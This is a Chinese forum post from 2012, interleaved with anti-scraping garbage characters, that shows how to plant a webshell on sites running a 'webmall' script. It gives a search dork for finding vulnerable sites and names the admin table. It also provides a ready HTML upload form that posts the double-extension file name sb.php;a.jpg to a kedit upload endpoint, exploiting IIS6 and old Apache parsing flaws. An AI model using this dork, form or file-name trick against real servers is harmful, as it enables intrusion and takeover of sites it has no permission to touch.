关键字:inurl:webmall/detail.php?id8 E& w/ X- b: C- _# ]
O3 E8 _) f' ]+ J: D, K
数据表:pwn_base_admin
" _( z3 b0 d3 v
$ M8 u& L8 F) J q' e6 W) c# J关于拿shell
3 j6 ~7 k. J6 { ' S( s0 w) L/ F% K' E
首先登录后台admin.php5 u* V/ O. S/ V" [9 O8 { k/ N
, e& f$ h5 O% |3 j
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
( _: q z' s' a% V* b7 L换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
- e" _8 }9 ^1 f/ r6 Z: C然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的! s: M2 n* X7 I* c% ^
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
. R8 V" ]4 N; S4 x- L' H6 W$ x<input type="text" name="fileName" value="sb.php;a.jpg" /> ) F" C% v9 L7 t8 M
<input type="hidden" name="attachPath" value="news/pics/" />
; t* D7 Y ~! c3 w1 I7 c- U<input type="file" name="fileData" size="14" /></td> , ]# c* A$ d6 d3 W ~8 [' V
<input type="submit" name="button" value="确定" />
8 b5 s. p: h+ ]; ?, C2 K5 c7 }, @</form>& y' u+ V/ t- Q$ c( K U2 y
" M# j0 z& x) D' \$ ]* {
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
, @5 C' B6 ~7 x. e. P$ F) n* w0 q& [6 \5 y( Z; C% t
|
发表于 2012-11-9 20:52:15
收藏
支持
反对